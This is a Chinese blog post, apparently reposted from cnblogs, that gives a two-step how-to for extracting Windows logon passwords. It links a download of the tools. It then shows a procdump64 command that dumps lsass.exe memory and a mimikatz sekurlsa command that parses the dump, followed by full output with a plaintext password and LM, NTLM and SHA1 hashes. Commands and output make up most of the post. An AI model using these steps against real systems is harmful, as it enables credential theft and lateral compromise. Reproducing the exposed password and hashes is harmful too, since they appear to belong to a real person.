博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
两步完成利用procdump64+mimikatz获取win用户密码
阅读量:6434 次
发布时间:2019-06-23

本文共 4568 字,大约阅读时间需要 15 分钟。

使用procdump64+mimikatz可实现从内存中获取明文密码

工具

链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

1.导出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

 (注:必须使用管理员权限)

ProcDump v8.0 - Writes process dump filesCopyright (C) 2009-2016 Mark RussinovichSysinternals - www.sysinternals.comWith contributions from Andrew Richards[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds[15:33:28] Dump count reached.

2.执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必须使用管理员权限)

ECHO 处于打开状态。  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil! .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ##       > http://blog.gentilkiwi.com/mimikatz '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/mimikatz(commandline) # sekurlsa::minidump lsass.dmpSwitch to MINIDUMP : 'lsass.dmp'mimikatz(commandline) # sekurlsa::logonPasswords fullOpening : 'lsass.dmp' file for minidump...Authentication Id : 0 ; 137859 (00000000:00021a83)Session           : Interactive from 1User Name         : chengleeDomain            : chenglee-PCLogon Server      : CHENGLEE-PCLogon Time        : 2018/7/25 15:06:35SID               : S-1-5-21-452281122-3045282507-3243563612-1000	msv :		 [00000003] Primary	 * Username : chenglee	 * Domain   : chenglee-PC	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde	 * NTLM     : 8d0f8e1a18236379538411a9056799f5	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20	tspkg :		 * Username : chenglee	 * Domain   : chenglee-PC	 * Password : lizhenghua	wdigest :		 * Username : chenglee	 * Domain   : chenglee-PC	 * Password : lizhenghua	kerberos :		 * Username : chenglee	 * Domain   : chenglee-PC	 * Password : lizhenghua	ssp :		credman :	Authentication Id : 0 ; 137821 (00000000:00021a5d)Session           : Interactive from 1User Name         : chengleeDomain            : chenglee-PCLogon Server      : CHENGLEE-PCLogon Time        : 2018/7/25 15:06:35SID               : S-1-5-21-452281122-3045282507-3243563612-1000	msv :		 [00000003] Primary	 * Username : chenglee	 * Domain   : chenglee-PC	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde	 * NTLM     : 8d0f8e1a18236379538411a9056799f5	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20	tspkg :		 * Username : chenglee	 * Domain   : chenglee-PC	 * Password : lizhenghua	wdigest :		 * Username : chenglee	 * Domain   : chenglee-PC	 * Password : lizhenghua	kerberos :		 * Username : chenglee	 * Domain   : chenglee-PC	 * Password : lizhenghua	ssp :		credman :	Authentication Id : 0 ; 997 (00000000:000003e5)Session           : Service from 0User Name         : LOCAL SERVICEDomain            : NT AUTHORITYLogon Server      : (null)Logon Time        : 2018/7/25 15:06:15SID               : S-1-5-19	msv :		tspkg :		wdigest :		 * Username : (null)	 * Domain   : (null)	 * Password : (null)	kerberos :		 * Username : (null)	 * Domain   : (null)	 * Password : (null)	ssp :		credman :	Authentication Id : 0 ; 996 (00000000:000003e4)Session           : Service from 0User Name         : CHENGLEE-PC$Domain            : WORKGROUPLogon Server      : (null)Logon Time        : 2018/7/25 15:06:15SID               : S-1-5-20	msv :		tspkg :		wdigest :		 * Username : CHENGLEE-PC$	 * Domain   : WORKGROUP	 * Password : (null)	kerberos :		 * Username : chenglee-pc$	 * Domain   : WORKGROUP	 * Password : (null)	ssp :		credman :	Authentication Id : 0 ; 48630 (00000000:0000bdf6)Session           : UndefinedLogonType from 0User Name         : (null)Domain            : (null)Logon Server      : (null)Logon Time        : 2018/7/25 15:06:06SID               : 	msv :		tspkg :		wdigest :		kerberos :		ssp :		credman :	Authentication Id : 0 ; 999 (00000000:000003e7)Session           : UndefinedLogonType from 0User Name         : CHENGLEE-PC$Domain            : WORKGROUPLogon Server      : (null)Logon Time        : 2018/7/25 15:06:05SID               : S-1-5-18	msv :		tspkg :		wdigest :		 * Username : CHENGLEE-PC$	 * Domain   : WORKGROUP	 * Password : (null)	kerberos :		 * Username : chenglee-pc$	 * Domain   : WORKGROUP	 * Password : (null)	ssp :		credman :	mimikatz(commandline) # exitBye!

 看, 密码[lizhenghua]处于明文暴露状态.

如果不是使用管理员模式运行cmd会报错,

 

转载于:https://www.cnblogs.com/chenglee/p/9366399.html

你可能感兴趣的文章
使用Dezender对zend加密后的php文件进行解密
查看>>
Nginx配置之基于域名的虚拟主机
查看>>
基于DDD的.NET开发框架 - ABP模块设计
查看>>
Linux下tar.xz结尾的文件的解压方法
查看>>
Redis 脚本
查看>>
【转载】我心目中最好的框架组合是
查看>>
项目代码规范
查看>>
解释型语言与编译型语言的区别
查看>>
Oracle 创建主键自增表
查看>>
Discovering versions from the identity service failed when creating the password plugin.
查看>>
C#设计模式——生成器模式(Builder Pattern)
查看>>
06-Java 本地文件操作
查看>>
spring aop 环绕通知around和其他通知的区别
查看>>
每天一个linux命令(56):netstat命令
查看>>
python中模块sys与os的一些常用方法
查看>>
Atitit usrQBK1600 技术文档的规范标准化解决方案
查看>>
【知乎】怎么成为一个优秀的程序员,而不是一个优秀的码农?
查看>>
如何取消 DiscuzX 帖子被系统自动隐?
查看>>
POI对Excel自定义日期格式的读取
查看>>
网联能否一统天下,取决于三个问题
查看>>